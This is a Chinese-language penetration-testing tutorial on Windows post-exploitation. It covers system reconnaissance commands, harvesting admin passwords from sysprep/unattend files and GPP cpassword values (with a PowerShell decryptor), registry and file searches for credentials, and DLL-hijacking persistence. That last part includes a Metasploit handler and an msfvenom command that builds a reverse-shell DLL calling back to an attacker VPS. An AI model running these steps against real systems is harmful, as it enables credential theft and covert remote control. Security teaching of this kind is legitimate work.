一顆小胡椒
前言
看到一篇文章講到這個內容,就打算自己也整理一下順便梳理一下思路
0X01 信息收集
1.收集系統信息:
系統信息至關重要,關乎我們后面怎么提權
中文系統:systeminfo|findstr /B /C:"OS 名稱" /C:"OS 版本" 英文系統: systeminfo|findstr /B /C:"OS Name" /C:"OS Version"
例如:
C:\Users\Administrator>systeminfo|findstr /B /C:"OS 名稱" /C:"OS 版本" OS 名稱: Microsoft Windows Server 2008 R2 Standard OS 版本: 6.1.7600 暫缺 Build 7600
2.主機名和Shell用戶名
C:\Users\Administrator>hostname WIN-ITRDTMACNHN C:\Users\Administrator>echo %username% Administrator
3.其他用戶組和當前用戶詳細信息
通過這個信息收集我們能判斷我們的用戶屬于什么用戶組
C:\Users\Administrator>net users \\WIN-ITRDTMACNHN 的用戶帳戶 -------------------------------------------------------------- Administrator FTPuser Guest 命令成功完成。 C:\Users\Administrator>net user Administrator 用戶名 Administrator 全名 注釋 管理計算機(域)的內置帳戶 用戶的注釋 國家/地區代碼 000 (系統默認值) 帳戶啟用 Yes 帳戶到期 從不 上次設置密碼 2018/6/28 16:32:48 密碼到期 2018/8/9 16:32:48 密碼可更改 2018/6/28 16:32:48 需要密碼 Yes 用戶可以更改密碼 Yes 允許的工作站 All 登錄腳本 用戶配置文件 主目錄 上次登錄 2018/9/30 11:34:43 可允許的登錄小時數 All 本地組成員 *Administrators 全局組成員 *None 命令成功完成。
4.網絡配置信息
使用下面的三條命名就能比較好的看出主機
ipconfig /all route print arp -A
5.檢查主機的端口開放情況
netstat -ano
6.檢查主機的防火墻規則
C:\Users\Administrator>netsh firewall show state 防火墻狀態: ------------------------------------------------------------------- 配置文件 = 標準 操作模式 = 啟用 例外模式 = 啟用 多播/廣播響應模式 = 啟用 通知模式 = 禁用 組策略版本 = Windows 防火墻 遠程管理模式 = 禁用 所有網絡接口上的端口當前均為打開狀態: 端口 協議 版本 程序 ------------------------------------------------------------------- 800 TCP 任何 (null) C:\Users\Administrator>netsh firewall show config 域 配置文件配置: ------------------------------------------------------------------- 操作模式 = 啟用 例外模式 = 啟用 多播/廣播響應模式 = 啟用 通知模式 = 禁用 域 配置文件的允許的程序配置: 模式 流量方向 名稱/程序 ------------------------------------------------------------------- 禁用 入站 Windows 服務主進程 / C:\Windows\System32\svch st.exe 禁用 入站 Internet Explorer / C:\Program Files (x86)\In ernet Explorer\iexplore.exe 域 配置文件的端口配置: 端口 協議 流量方向 名稱 ------------------------------------------------------------------- 800 TCP 啟用 入站 test 域 配置文件的 ICMP 配置: 模式 類型 描述 ------------------------------------------------------------------- 啟用 2 允許出站數據包太大 標準 配置文件配置(當前): ------------------------------------------------------------------- 操作模式 = 啟用 例外模式 = 啟用 多播/廣播響應模式 = 啟用 通知模式 = 禁用 標準 配置文件的允許的程序配置: 模式 流量方向 名稱/程序 ------------------------------------------------------------------- 啟用 入站 Windows 服務主進程 / C:\Windows\System32\svch st.exe 標準 配置文件的端口配置: 端口 協議 流量方向 名稱 ------------------------------------------------------------------- 800 TCP 啟用 入站 test 標準 配置文件的 ICMP 配置: 模式 類型 描述 ------------------------------------------------------------------- 啟用 2 允許出站數據包太大 日志配置: ------------------------------------------------------------------- 文件位置 = C:\Windows\system32\LogFiles\Firewall\pfirewall.log 文件大小上限 = 4096 KB 丟棄的數據包數 = 禁用 連接數 = 禁用
7.計劃任務
C:\Users\K0rz3n>schtasks /query /fo LIST /v
主機名: DESKTOP-S2L4C24 任務名: \CorelUpdateHelperTaskCore 下次運行時間: 2019/1/23 0:32:42 模式: 就緒 登錄狀態: 交互方式/后臺方式 上次運行時間: 2019/1/22 0:32:42 上次結果: 0 創建者: N/A 要運行的任務: c:\Program Files (x86)\Corel\CUH\v2\CUH.exe /t 起始于: N/A 注釋: N/A 計劃任務狀態: 已啟用 空閑時間: 已禁用 電源管理: 在電池模式停止, 不用電池啟動 作為用戶運行: Users 刪除沒有計劃的任務: 已禁用 如果運行了 X 小時 X 分鐘,停止任務: 72:00:00 計劃: 計劃數據在此格式中不可用。 計劃類型: 每天 開始時間: 0:32:42 開始日期: 2018/10/7 結束日期: N/A 天: 每 1 天 月: N/A 重復: 每: 已禁用 重復: 截止: 時間: 已禁用 重復: 截止: 持續時間: 已禁用 重復: 如果還在運行,停止: 已禁用
8.正在運行的進程
C:\Users\Administrator>tasklist /SVC
映像名稱 PID 服務
========================= ======== =======================================
System Idle Process 0 暫缺
System 4 暫缺
smss.exe 232 暫缺
csrss.exe 332 暫缺
wininit.exe 384 暫缺
csrss.exe 392 暫缺
winlogon.exe 448 暫缺
services.exe 484 暫缺
lsass.exe 500 SamSs
lsm.exe 508 暫缺
svchost.exe 608 DcomLaunch, PlugPlay, Power
vmacthlp.exe 672 VMware Physical Disk Helper Service
svchost.exe 716 RpcEptMapper, RpcSs
svchost.exe 788 Dhcp, eventlog, lmhosts
svchost.exe 844 gpsvc, IKEEXT, iphlpsvc, LanmanServer,
ProfSvc, Schedule, seclogon, SENS,
ShellHWDetection, Winmgmt, wuauserv
svchost.exe 932 EventSystem, netprofm, nsi
svchost.exe 996 Netman, TrkWks, UxSms
svchost.exe 256 CryptSvc, Dnscache, LanmanWorkstation,
NlaSvc, WinRM
svchost.exe 688 BFE, DPS, MpsSvc
spoolsv.exe 1092 Spooler
svchost.exe 1124 AppHostSvc
svchost.exe 1148 ftpsvc
svchost.exe 1324 RemoteRegistry
...
9.已經啟動的服務
C:\Users\Administrator>net start 已經啟動以下 Windows 服務: Application Host Helper Service Base Filtering Engine COM+ Event System COM+ System Application Cryptographic Services DCOM Server Process Launcher Desktop Window Manager Session Manager DHCP Client Diagnostic Policy Service Distributed Link Tracking Client Distributed Transaction Coordinator DNS Client Group Policy Client IKE and AuthIP IPsec Keying Modules IP Helper IPsec Policy Agent Microsoft FTP Service Network Connections Network List Service Network Location Awareness Network Store Interface Service Plug and Play Power Print Spooler Remote Procedure Call (RPC) Remote Registry RPC Endpoint Mapper ...
10.已經安裝的驅動
C:\Users\Administrator>driverquery 模塊名 顯示名稱 驅動程序類型 鏈接日期 ============ ====================== ============= ====================== 1394ohci 1394 OHCI Compliant Ho Kernel 2009/7/14 8:07:12 ACPI Microsoft ACPI Driver Kernel 2009/7/14 7:19:34 AcpiPmi ACPI Power Meter Drive Kernel 2009/7/14 7:27:17 adp94xx adp94xx Kernel 2008/12/6 7:54:42 adpahci adpahci Kernel 2007/5/2 1:30:09 adpu320 adpu320 Kernel 2007/2/28 8:04:15 AFD Ancillary Function Dri Kernel 2009/7/14 7:21:40 agp440 Intel AGP Bus Filter Kernel 2009/7/14 7:38:43 aliide aliide Kernel 2009/7/14 7:19:47 amdide amdide Kernel 2009/7/14 7:19:49 AmdK8 AMD K8 Processor Drive Kernel 2009/7/14 7:19:25 AmdPPM AMD Processor Driver Kernel 2009/7/14 7:19:25 amdsata amdsata Kernel 2009/5/20 1:53:21 amdsbs amdsbs Kernel 2009/3/21 2:36:03 amdxata amdxata Kernel 2009/5/20 1:56:59 ...
11.使用 wmic 收集重要信息
運行下面這個腳本來收集進程,服務,用戶帳戶,用戶組,網絡接口,硬盤驅動器信息,網絡共享信息,已安裝的 Windows 補丁程序,啟動時運行的程序,已安裝軟件列表,操作系統和時區信息。
for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set "var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName /format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,MACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace /format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get Description,InstallDate,InstallLocation,PackageCache,Vendor,Version /format:"%var%" >> out.html
wmic os get name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUser,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> out.html
補充:
使用下面的命令也可獲取主機的已經安裝的補丁信息
wmic qfe get Caption,Description,HotFixID,InstalledOn
0X02 利用特權提升漏洞直接提權
這一部分的內容我在我的 滲透測試小技巧一 中 寫過了,這里就不在贅述
0X03 在計算機中獲取明文或者可解密的密碼
現實的域環境中會有大量的服務器需要配置,作為一個管理員是不可能一臺一臺的配置的,他們通常會選擇自動化安裝或者克隆,這就可能會遺留下安裝過程的配置文件,這些配置文件中會包含許多敏感信息,例如管理員賬號密碼。
1.使用 Sysprep.exe 批量部署
為同類計算環境中具有相似硬件配置的基于 Windows 的成千上萬臺計算機進行部署的企業客戶希望能自定義一臺計算機,然后將其硬盤(或”映像”)復制到公司的其他計算機上。同樣,網絡管理員希望在必要時能在時間關鍵的環境中快速替換計算機。
單位中的系統管理員通常會預裝客戶計算機,或物理訪問每臺客戶機以安裝操作系統,Sysprep 的設計旨在降低此類任務產生的費用。它使管理員(或第三方集成商)能將單個工作站配置復制到多臺客戶機,從而大大節約了管理時間和資源。管理員只需做出一組有關計算機設置的假設,從而減少了標準 Windows 安裝的開銷。
Sysprep.inf
作為建立并部署標準映像的一部分,您可能需要為單個目標計算機自定義少量設置及參數。例如,每個基于 Windows 2000 的計算機需要有唯一的計算機名。”最小安裝向導”通常會提示用戶保留信息。不過在許多情況下,如果您知道必要信息并且不希望提示用戶輸入這些信息,則可使用可選的應答文件 Sysprep.inf 實現自動輸入。使用 Sysprep.inf 文件,您可讓”最小安裝向導”只提示某些信息,或創建完全自動的安裝。
最小安裝向導
計算機第一次從復制磁盤啟動時,”最小安裝向導”啟動。它收集新復制的目標計算機所需的全部信息。如果不使用 Sysprep.inf,則”最小安裝向導”顯示以下項目:
歡迎 Microsoft 許可協議 產品 ID 區域設置 用戶名和公司 計算機名和管理員密碼 TAPI 設置(僅適于有調制解調器時) 網絡配置 加入工作組或域(僅適于工作站) 服務器許可(僅適于服務器) 時區選擇 完成/重新啟動
也就是說,我們在 sysprep.inf 中指定的信息克隆計算機在安裝時就會默認填好,并且不能被更改,那么如果管理員填入了密碼的話我們就能通過這個文件獲取
當然除了使用 sysprep 這種方式以外,還有與之類似的無人安裝的方式,這種方式使用的配置文件是 unattend.txt
通常這些敏感文件會出現在下面目錄
c:\sysprep.inf c:\sysprep\sysprep.xml %WINDIR%\Panther\Unattend\Unattended.xml %WINDIR%\Panther\Unattended.xml
這些配置文件極可能包含明文密碼,也可能會出現 base64 編碼的情況,下面是一些配置文件的事例:
# This is a sample from sysprep.inf with clear-text credentials.
[GuiUnattended]
OEMSkipRegional=1
OemSkipWelcome=1
AdminPassword=s3cr3tp4ssw0rd
TimeZone=20
# This is a sample from sysprep.xml with Base64 "encoded" credentials. Please people Base64 is not
encryption, I take more precautions to protect my coffee. The password here is "SuperSecurePassword".
<LocalAccounts>
<LocalAccount wcm:action="add">
<Password>
<Value>U3VwZXJTZWN1cmVQYXNzd29yZA==Value>
<PlainText>falsePlainText>
Password>
<Description>Local AdministratorDescription>
<DisplayName>AdministratorDisplayName>
<Group>AdministratorsGroup>
<Name>AdministratorName>
LocalAccount>
LocalAccounts>
# Sample from Unattended.xml with the same "secure" Base64 encoding.
<AutoLogon>
<Password>
<Value>U3VwZXJTZWN1cmVQYXNzd29yZA==Value>
<PlainText>falsePlainText>
Password>
<Enabled>trueEnabled>
<Username>AdministratorUsername>
AutoLogon>
關于以上更詳細的內容請參看 這篇文章(https://www.xuebuyuan.com/2082105.html)
1.使用 GPP(Group Policy Preferences) 部署
在域中,存在一個默認的共享路徑:
\\<DOMAIN>\SYSVOL\<DOMAIN>\
所有域內主機都能訪問,里面保存組策略相關數據,包含登錄腳本配置文件等
例如,測試主機所在域為test.local,可訪問共享文件夾\test.local\SYSVOL\test.local,如下圖
想要批量修改域內主機本地管理員密碼,常常通過配置組策略執行vbs腳本的方式
給出一個修改密碼的vbs腳本(實現方式不唯一),代碼如下:
strComputer = "."
Set objUser = GetObject("WinNT://" & strComputer & "/Administrator, user")
objUser.SetPassword "domain123!"
objUser.SetInfo
這種實現方式,最大的弊端在于修改后的密碼會明文保存在vbs腳本中,而該vbs腳本通常會保存在共享文件夾\SYSVOL
這就存在一個隱患: 任何域用戶都能讀取該vbs腳本,也就能夠獲取腳本中保存的明文密碼
于是我們還可以通過 GPP(組策略偏好)來進行配置
開始-管理工具-組策略管理
選擇域test.local,右鍵,選中在這個域中創建GPO并在此處鏈接,如下圖
設置名稱為test6
test6-設置-右鍵-編輯-用戶配置-首選項-控制面板設置-本地用戶和組,如下圖
更新,administrator(內置),設置密碼,如下圖
委派,設置權限
在詳細一欄,可看到該策略對應的ID為{E6424F10-C44B-4C45-8527-740189CBF60E}
至此,組策略配置完成,域內主機重新登錄,即可應用此策略,在共享文件夾\SYSVOL中可看到組策略對應ID的文件夾,如下圖
由于我們剛剛修改了用戶配置下的控制面板,所以在對應的文件夾下能找到配置文件Groups.xml,具體路徑如下:
\\test.local\SYSVOL\test.local\Policies\{E6424F10-C44B-4C45-8527-740189CBF60E}\User\Preferences\Groups
Groups.xml內容如下:
- <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
- <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="Administrator (內置)" image="2" changed="2017-09-25 22:57:53" uid="{463245FF-08D3-4A28-95E7-42AB416DC508}">
<Properties action="U" newName="" fullName="" description="" cpassword="9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U" changeLogon="0" noChange="0" neverExpires="0" acctDisabled="0" subAuthority="RID_ADMIN" userName="Administrator (內置)" />
User>
Groups>
值得注意的是其中的cpassword項,保存的是加密后的內容”9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U”
加密方式為AES 256,雖然目前AES 256很難被攻破,但是微軟選擇公開了該AES 256加密的私鑰,地址如下:
https://msdn.microsoft.com/en-us/library/cc422924.aspx
我們可以借助下面這個項目將明文密碼還原
https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Get-GPPPassword.ps1
該腳本可在域內主機上執行,能夠自動查詢共享文件夾\SYSVOL中的文件,還原出所有明文密碼
測試如下圖
當然,僅僅為了解密cpassword=”9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U”,我們可以對以上powershell腳本的功能簡化
簡化代碼如下:
function Get-DecryptedCpassword {
[CmdletBinding()]
Param (
[string] $Cpassword
)
try {
#Append appropriate padding based on string length
$Mod = ($Cpassword.length % 4)
switch ($Mod) {
'1' {$Cpassword = $Cpassword.Substring(0,$Cpassword.Length -1)}
'2' {$Cpassword += ('=' * (4 - $Mod))}
'3' {$Cpassword += ('=' * (4 - $Mod))}
}
$Base64Decoded = [Convert]::FromBase64String($Cpassword)
#Create a new AES .NET Crypto Object
$AesObject = New-Object System.Security.Cryptography.AesCryptoServiceProvider
[Byte[]] $AesKey = @(0x4e,0x99,0x06,0xe8,0xfc,0xb6,0x6c,0xc9,0xfa,0xf4,0x93,0x10,0x62,0x0f,0xfe,0xe8,
0xf4,0x96,0xe8,0x06,0xcc,0x05,0x79,0x90,0x20,0x9b,0x09,0xa4,0x33,0xb6,0x6c,0x1b)
#Set IV to all nulls to prevent dynamic generation of IV value
$AesIV = New-Object Byte[]($AesObject.IV.Length)
$AesObject.IV = $AesIV
$AesObject.Key = $AesKey
$DecryptorObject = $AesObject.CreateDecryptor()
[Byte[]] $OutBlock = $DecryptorObject.TransformFinalBlock($Base64Decoded, 0, $Base64Decoded.length)
return [System.Text.UnicodeEncoding]::Unicode.GetString($OutBlock)
}
catch {Write-Error $Error[0]}
}
Get-DecryptedCpassword "9XLcz+Caj/kyldECku6lQ1QJX3fe9gnshWkkWlgAN1U
"也就是說:域管理員在使用組策略批量管理域內主機時,
如果配置組策略的過程中需要填入密碼,
那么該密碼會被保存到共享文件夾\SYSVOL下,
默認所有域內用戶可訪問,雖然被加密,但很容易被解密
為此,微軟發布了補丁KB2962486,下載地址:
https://technet.microsoft.com/library/security/ms14-025
系統打了補丁后,組策略中無法設置用戶名密碼,如下圖
除了 Groups.xml 以外,其他幾個策略首選項文件也可能存在 “cPassword” 屬性
Services\Services.xml http://msdn.microsoft.com/en-us/library/cc980070(v=prot.13) ScheduledTasks\ScheduledTasks.xml http://msdn.microsoft.com/en-us/library/cc422920(v=prot.13) http://msdn.microsoft.com/en-us/library/dd341350(v=prot.13) http://msdn.microsoft.com/en-us/library/dd304114(v=prot.13) Printers\Printers.xml http://msdn.microsoft.com/en-us/library/cc422918(v=prot.13) Drives\Drives.xml http://msdn.microsoft.com/en-us/library/cc704598(v=prot.13) DataSources\DataSources.xml http://msdn.microsoft.com/en-us/library/cc422926(v=prot.13)
0X04 輔助的命令
1.下面的命令將在文件系統中搜索包含特定關鍵字的文件名,可以指定任意多的關鍵字。
C:\Windows\system32> dir /s *pass* == *cred* == *vnc* == *.config*
2.搜索某些文件類型的關鍵字
C:\Windows\system32> findstr /si password *.xml *.ini *.txt
3.下面的兩個命令可以用于grep注冊表中的關鍵字,在本例中是“password”。
C:\Windows\system32> reg query HKLM /f password /t REG_SZ /s C:\Windows\system32> reg query HKCU /f password /t REG_SZ /s
0X05 輔助的工具
accesschk.exe 來批量檢查權限信息
這個工具來源于工具集 Sysinternals Suite ,感興趣的可以在這里下載。該工具的主要作用就是判斷用戶對于指定文件或者目錄下面的所有文件的讀寫權限(R 是讀,W 是寫)
1.查看 d:/test 目錄下所有文件對每個用戶組的權限情況
2.查看指定用戶組對文件夾下文件的權限
3.查看某個用戶組對指定服務的權限
4.查看對某個用戶組有寫權限的所有服務
5.查看某個用戶或用戶組對某個注冊表項的權限
這里 hklm 是 HKEY_LOCAL_MACHINE 的縮寫,HKEY_CLASSES_ROOT 的縮寫是 hkcr
0X06 權限維持
后門是權限維持的必要手段,那么怎么才能安放一個好的后門就非常有技巧,之前我在前面文章中講過影子賬戶的創建,感興趣的同學可以移步 這里
當然還有一種更加復雜并且隱蔽的方法:DLL 劫持,這個方法不僅僅在創建后門的時候被經常用到,在 Bypass UAC 的時候也是一種核心的手段
1.簡單的介紹一下
我們知道,程序在編譯的時候往往為了節約空間不會將運行時用到的所有的庫都靜態編譯進 exe 文件中,這樣就意味著我們在運行程序的時候程序會去系統中加載需要的動態鏈接庫,這就是我們所說的 DLL (Linux 下的動態鏈接庫是 .so 文件,windows 下是 .dll)。
系統會有一個尋找 dll 文件的默認順序,當將惡意的 DLL 文件放到其中一個路徑下,并保證該惡意 DLL 先于合法的 DLL 被程序找到時就會發生 DLL 劫持;也可能是程序尋找的 DLL 文件名在系統中并不存在,這時我們只需將自己定制的 DLL 文件放到程序的搜索路徑也可以達到目的。
下面你可以看到在一個 32 位系統中 DLL 的搜索順序:
1 - 應用加載的目錄 2 - 32-bit 系統目錄(C:\Windows\System32) 3 - 16-bit 系統目錄 (C:\Windows\System) 4 - Windows 目錄(C:\Windows) 5 - 當前工作目錄 (CWD) 6 - 環境變量中的目錄 (system then user)
通過上面的搜索路徑可以看到第六點環境變量,這也是我們比較容易控制的路徑,如果目標裝有 python,那么 Path = C:\Python27 就是我們可以控制的路徑,我們只需要將惡意定制的 DLL 文件放到這個目錄就可以。
2.利用步驟
1.首先在我的公網 vps 開啟 msf 建立監聽
msf5 > use exploit/multi/handler msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf5 exploit(multi/handler) > set lhost xxx.xxx.xxx.xxx lhost => xxx.xxx.xxx.xxx msf5 exploit(multi/handler) > set lport 9999 lport => 9999 msf5 exploit(multi/handler) > exploit [*] Started reverse TCP handler on xxx.xxx.xxx.xxx:9999
2.利用 DllHijackAuditor 工具進行 dll 劫持檢測
3.在本地的 msf 上生成需要利用的 payload
msf > msfvenom -p windows/meterpreter/reverse_tcp l_host=xxx.xxx.xxx.xxx lport=9999 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0 [*] exec: msfvenom -p windows/meterpreter/reverse_tcp l_host=xxx.xxx.xxx.xxx lport=9999 -f dll -o /root/ext-ms-win-kernel32-package-current-l1-1-0 [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder or badchars specified, outputting raw payload Payload size: 341 bytes Final size of dll file: 5120 bytes Saved as: /root/ext-ms-win-kernel32-package-current-l1-1-0
然后我將其放在軟件相同的目錄下,如下圖:
4.運行后獲取 meterpreter 的shell
參考鏈接
https://mp.weixin.qq.com/s/JeYxI2usvJCwmijYEefmOw?
http://www.fuzzysecurity.com/tutorials/16.html
https://www.freebuf.com/vuls/92016.html
https://www.xuebuyuan.com/2082105.html
https://blog.csdn.net/Fly_hps/article/details/80641585
http://blog.51cto.com/rangercyh/497497
LemonSec
LemonSec
一顆小胡椒
LemonSec
GoUpSec
聚銘網絡
LemonSec
系統安全運維
系統安全運維
雁行安全團隊
HACK學習呀
安全客
